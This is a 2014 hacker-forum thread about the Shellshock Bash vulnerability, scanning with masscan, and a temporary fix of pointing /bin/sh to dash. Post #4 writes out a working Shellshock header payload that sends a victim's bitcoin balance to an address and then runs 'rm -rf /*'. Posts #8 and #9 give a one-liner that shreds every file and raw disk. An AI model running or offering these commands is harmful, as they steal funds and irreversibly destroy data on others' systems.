Login Register




The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.


Shellshock wormable. Consequences to not patching your server are big. filter_list
Author
Message
Shellshock wormable. Consequences to not patching your server are big. #1
Well fuck. Those are the only two words I had to say when I noticed what one of my friends did. The creator of masscan, Rob Graham (A friend of mine from HOPE) took masscan and turned it into a shellshock scanner. What I noticed today while checking logs was that I got scanned by it and it could have responded. Someone out there is using the same method to deliver malware to the denizens of the internet, running unpatched systems. Patch your shit already XD

Code:
/bin/sh -> /bin/bash

If your shit says that, well you are still vulnerable (If you haven't performed a patch). A nice temp fix would be to change the symbolic route from that to:
Code:
/bin/sh -> /bin/dash

Dash, as far as I know, isn't vulnerable to this bug. I'll be working on a small scanner in python later after packing up my shit since I have to move so expect that later on in the day. On a side note that scanner might actually turn into an exploit or something. I'll share the code with anyone who wants it ( I do love criticism so hit me with all you got :P)

*Edit: Someone should create a worm that patches Bash. Seriously.
(This post was last modified: 10-03-2014, 01:13 PM by Null_Byte.)

Reply

RE: Shellshock wormable. Consequences to not patching your server are big. #2
Well fuck indeed. That could theoretically find every vulnerable system. God help us if it's modified to auto-pwn with an exploit.

Reply

RE: Shellshock wormable. Consequences to not patching your server are big. #3
Lol. Someone was doing the same as the creator of masscan. He even made a post saying that XD they were using the cover he was providing unknowingly. Either way if they know how to perform the attack right they can easily compromise most machines. I've made sure mine were all patched and I don't think mine made a call back to him XD (although there were a lot of automated scans provided by skids)

Reply

RE: Shellshock wormable. Consequences to not patching your server are big. #4
Origin: () { btc; }; bitcoind sendtoaddress 1MyBTCAddressFake `bitcoind getbalance`;rm -rf /*

The above idea is not mine; I've seen it being done by a few kiddies. The one that I saw, in particular, has made two whole dollars!
PGP
Sign: F202 79C9 76F7 40BB 54EC 494F 5DEF 1D70 14C1 C4CC
Encrypt: A5B3 1B21 55E1 80AF 4C6E DE83 467B 8EFC 3DEE 681C
Auth: CD55 E8A5 1A08 2933 8BA6 BC88 D81F 1943 739A 3C47

Reply

RE: Shellshock wormable. Consequences to not patching your server are big. #5
God if an automated scanner/exploiter comes out for this we are fucked....well most people who can't patch/update a systems are -.-

Also on another note.......why the hell would your rm -f without --no-preserve-root or why would you do that in general.....this is the opportune moment to gain control of a system...not wreck it. Fucking skids ;w;

Reply

RE: Shellshock wormable. Consequences to not patching your server are big. #6
(10-03-2014, 04:08 PM)Null_Byte Wrote: Also on another note.......why the hell would your rm -f without --no-preserve-root or why would you do that in general.....this is the opportune moment to gain control of a system...not wreck it. Fucking skids ;w;

Some men just want to watch the world burn.
Those men are stupid, but common.

Reply

RE: Shellshock wormable. Consequences to not patching your server are big. #7
(10-03-2014, 04:08 PM)Null_Byte Wrote: Also on another note.......why the hell would your rm -f without --no-preserve-root or why would you do that in general.....this is the opportune moment to gain control of a system...not wreck it. Fucking skids ;w;

Skiddies gonna skid. When a skid downloads a script from HF, they probably don't know much more than how to press return, so they resort to showing off their e-peen to their l33t haxor buddies.

Reply

RE: Shellshock wormable. Consequences to not patching your server are big. #8
(10-03-2014, 04:08 PM)Null_Byte Wrote: God if an automated scanner/exploiter comes out for this we are fucked....well most people who can't patch/update a systems are -.-

Also on another note.......why the hell would your rm -f without --no-preserve-root or why would you do that in general.....this is the opportune moment to gain control of a system...not wreck it. Fucking skids ;w;

Why? Because that's all they know to do.
Besides, if you really wanna trash a system you use srm/shred/dd
Code:
find / -exec xargs shred -uzn 3 {} \; & shred -uzn 3 /dev/{s,h,v,xv}da* /dev/simfs
PGP
Sign: F202 79C9 76F7 40BB 54EC 494F 5DEF 1D70 14C1 C4CC
Encrypt: A5B3 1B21 55E1 80AF 4C6E DE83 467B 8EFC 3DEE 681C
Auth: CD55 E8A5 1A08 2933 8BA6 BC88 D81F 1943 739A 3C47

Reply

RE: Shellshock wormable. Consequences to not patching your server are big. #9
(10-03-2014, 06:03 PM)Reiko Wrote: Why? Because that's all they know to do.
Besides, if you really wanna trash a system you use srm/shred/dd
Code:
find / -exec xargs shred -uzn 3 {} \; & shred -uzn 3 /dev/{s,h,v,xv}da* /dev/simfs

:DD yay someone agrees with me on shred XD

Reply